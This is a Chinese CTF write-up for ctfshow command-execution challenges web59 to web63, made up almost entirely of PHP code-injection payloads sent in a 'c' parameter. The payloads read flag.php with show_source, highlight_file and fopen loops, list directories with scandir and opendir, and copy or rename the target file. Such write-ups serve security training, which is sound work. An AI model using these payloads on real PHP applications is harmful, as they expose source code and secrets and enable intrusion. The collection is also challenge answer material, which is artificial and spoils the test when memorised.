1.web59
payload:
最后三个payload读取到的内容不会直接显示在页面上,而是显示在网站源代码中(原样输出的内容以<?php开头,浏览器不会把它渲染出来,需要查看源代码)
c=show_source("flag.php");
c=highlight_file("flag.php");
c=var_dump(file("flag.php"));
c=$a=fopen('flag.php','r');while(!feof($a)){$line=fgets($a);echo $line;}
c=$a=fopen('flag.php','r');while(!feof($a)){$line=fgetc($a);echo $line;}
c=$a=fopen('flag.php','r');while(!feof($a)){$line=fgetcsv($a);echo var_dump($line);}
2.web60
payload:
c=show_source('flag.php');
c=highlight_file('flag.php');
c=$a=fopen('flag.php','r');while(!feof($a)){$line=fgetc($a);echo $line;}
c=$a=fopen('flag.php','r');while(!feof($a)){$line=fgetcsv($a);echo var_dump($line);}
c=copy("flag.php","flag.txt");
c=rename("flag.php","flag.txt");#rename会把原文件移走,执行后同一环境中其余读取flag.php的payload都会失效
3.web61
payload:
c=show_source('flag.php');
c=highlight_file('flag.php');
c=print_r(scandir(dirname(__FILE__)));#扫描当前目录有什么文件
c=$a=opendir('./');while(($file = readdir($a)) !=false){echo $file." ";} #扫描当前目录有什么文件
c=print_r(scandir(current(localeconv())));#扫描当前目录有什么文件
c=highlight_file(next(array_reverse(scandir((dirname(__FILE__))))));#scandir默认按字母升序返回,倒序后取第二项;只有当flag.php恰好排在倒数第二时才会读到它
4.web62
payload:
c=show_source('flag.php');
c=highlight_file('flag.php');
c=print_r(scandir(dirname(__FILE__)));#扫描当前目录有什么文件
c=$a=opendir('./');while(($file = readdir($a)) !=false){echo $file." ";} #扫描当前目录有什么文件
c=print_r(scandir(current(localeconv())));#扫描当前目录有什么文件
c=highlight_file(next(array_reverse(scandir((dirname(__FILE__))))));
5.web63
payload:
c=show_source('flag.php');
c=highlight_file('flag.php');
c=print_r(scandir(dirname(__FILE__)));#扫描当前目录有什么文件
c=$a=opendir('./');while(($file = readdir($a)) !=false){echo $file." ";} #扫描当前目录有什么文件
c=print_r(scandir(current(localeconv())));#扫描当前目录有什么文件
c=highlight_file(next(array_reverse(scandir((dirname(__FILE__))))));
参考文章:
ctfshow命令执行